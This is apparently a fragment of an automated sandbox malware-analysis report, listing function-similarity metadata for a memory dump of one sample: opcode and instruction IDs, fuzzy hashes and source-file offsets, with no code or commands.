                                                          • Instruction ID: b1dea3ef2672426f20978a07809edcfda874e0936be62b9f63dc2ce9553c04a4
                                                          • Opcode Fuzzy Hash: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
                                                          • Instruction Fuzzy Hash: A4A12572A083214FC719DF2CD4C062AB7E6EFC6310F1A862DE59597392E735DC4A8B81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7989778ee194da6e26b08462518e7c83b42de7adacc9a7c3a39deaf6306a5ae6
                                                          • Instruction ID: 2acb409cb0d1ccfd3578b97ca19380bcdc84f51d73d25d7918f614af922ac607
                                                          • Opcode Fuzzy Hash: 7989778ee194da6e26b08462518e7c83b42de7adacc9a7c3a39deaf6306a5ae6
                                                          • Instruction Fuzzy Hash: D1A19235A501598FEB39DE29CC81FDA73A2EFCC310F0A8525ED599F391EA30AD458780
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c70e644411eb5a758f252306900f1deaa3c1e5de849154a7ee486a5edab2e598
                                                          • Instruction ID: 29fbaa8432663f640d08b326947471fda0016dd4897d8747b75bc881fb1a329e
                                                          • Opcode Fuzzy Hash: c70e644411eb5a758f252306900f1deaa3c1e5de849154a7ee486a5edab2e598
                                                          • Instruction Fuzzy Hash: 9CC1F771918B419BD326CF39C881BE6F7E1BFD9300F109A1EE5EA96241EB707584CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c857042a37b075725f7e2b1737408c3a2b712658e8e261f9bdcf5fe52375c71
                                                          • Instruction ID: 4b585b786aa99b67bf164e5da4daa518b74179d0eb414a56ade518baafa40d81
                                                          • Opcode Fuzzy Hash: 3c857042a37b075725f7e2b1737408c3a2b712658e8e261f9bdcf5fe52375c71
                                                          • Instruction Fuzzy Hash: B7712E2220C6501BDB355A2C488037AAFD7BBC6311F998A6BE4E9C7385D635DC42DB93
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8b92f8211c3ecad43c26100d4b88c3ba35a3d2a4af0dad577f698464922d69f5
                                                          • Instruction ID: ab4e18dd911a0d4951b96a70bf0b42a83fd449443fed4883f11a63eefada43fb
                                                          • Opcode Fuzzy Hash: 8b92f8211c3ecad43c26100d4b88c3ba35a3d2a4af0dad577f698464922d69f5
                                                          • Instruction Fuzzy Hash: EF81F761D0D79857E6219B359A017ABB3E4AFE5308F099B2EBD8C61113FB34B9D48342
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 46d989e6847da3270c070d1299f0cb2bd496497b7e9a8d41225eff26fd418e1b
                                                          • Instruction ID: a9a8e1f088a4069ca4b8ad9bd634acf51cda0b8f7b277986157720ec36a3fd79
                                                          • Opcode Fuzzy Hash: 46d989e6847da3270c070d1299f0cb2bd496497b7e9a8d41225eff26fd418e1b
                                                          • Instruction Fuzzy Hash: 7871F532A087258BC7109F18D89072ABBE1FFD9324F19872DE8944B395D339ED51CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 16077fd4791978e44139a93f76ac525fd6ca093ed64445ed0380465a595cdf74
                                                          • Instruction ID: 0ffde425f1cca809bfd39e489a04dc0b18494714c428ce65a872664e6b4c6ada
                                                          • Opcode Fuzzy Hash: 16077fd4791978e44139a93f76ac525fd6ca093ed64445ed0380465a595cdf74
                                                          • Instruction Fuzzy Hash: 0A81C772D14B828BD3248F28C8906FABBA0FFDA314F144B1EE8D606682E774A581C755
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a63037baf02e83d369e15499cb8615f198298c3ab36ec6f1ce5b75770a72d04
                                                          • Instruction ID: f0189ee907ffbcc32a90f4ee891a5722df090f68c8938689d7ccfd2181337768
                                                          • Opcode Fuzzy Hash: 3a63037baf02e83d369e15499cb8615f198298c3ab36ec6f1ce5b75770a72d04
                                                          • Instruction Fuzzy Hash: CC810B72D14B82CBD7148F24C8906B6BBA0FFDA310F149B1EE9E617742E778A581C741
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dd8e344a5b7daa297ff0c0651b3501a37d333c86a7d30b6c7c28b71f979bdbbc
                                                          • Instruction ID: 190c3d13c63ae63c07265adb487b9909a2191b4d177fbae278e101ab39a0ccab
                                                          • Opcode Fuzzy Hash: dd8e344a5b7daa297ff0c0651b3501a37d333c86a7d30b6c7c28b71f979bdbbc
                                                          • Instruction Fuzzy Hash: 8D714572D097848FD7118F688880BB97BA2BFC6314F29C76EE8955B393E7749A41C740
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e9e2f7b55f0cae4ac25186441727d6647ca807ed9d09f81c7eae5cec28842343
                                                          • Instruction ID: 078484a57f416a57931ed9ede5b97f541cb275e2b04c62ea4d55fe7cd607b113
                                                          • Opcode Fuzzy Hash: e9e2f7b55f0cae4ac25186441727d6647ca807ed9d09f81c7eae5cec28842343
                                                          • Instruction Fuzzy Hash: 3C41F073F20A290BE34CD969ACA526A77C2A7C4310F4A463DDA96C73C2EC74DD1693C0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                          • Instruction ID: 540fbc84b11ec4a676724a0f859b487a2a4cff6bb43f5ac2b5910371f385ba51
                                                          • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                          • Instruction Fuzzy Hash: BCF0AF33B612290BA360CDB66C001DBA6C3B3C0370F1F8965EC44D7546E9348C4A86C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                          • Instruction ID: 32b74e4a3021b41be69e6096e1c1040b3666a481cc951111fea660b12908c91f
                                                          • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                          • Instruction Fuzzy Hash: DBF08C33A20B340B6360CC7A8D05097A2C7A7C86B0B0FC969ECA0E7206E930EC0656D1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6adaf5fb464e5338fc608544afa1f41a3860ba3812bc00e85db94882f7046dca
                                                          • Instruction ID: 1000f91066f731f7cf6883a8eefe080034c7982a485d73013ec04f232eb512f7
                                                          • Opcode Fuzzy Hash: 6adaf5fb464e5338fc608544afa1f41a3860ba3812bc00e85db94882f7046dca
                                                          • Instruction Fuzzy Hash: F9B012329142008B5707CA34ED7119133B277F6300795D4EDD00349011D739D0528604
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: [
                                                          • API String ID: 0-784033777
                                                          • Opcode ID: f216c3e9338d378bb6fdf3a8cc179031f028904ee69eb45c250501c5a72a8b76
                                                          • Instruction ID: 9425e2cc297587dfbe0349dd438f7723281f21ef44c2e75c5e8ee744b9b59bef
                                                          • Opcode Fuzzy Hash: f216c3e9338d378bb6fdf3a8cc179031f028904ee69eb45c250501c5a72a8b76
                                                          • Instruction Fuzzy Hash: 9AB169715383835BDB359E24889C7FA7BE8FB553C8F18052EE8C5C6182E76DC8A48752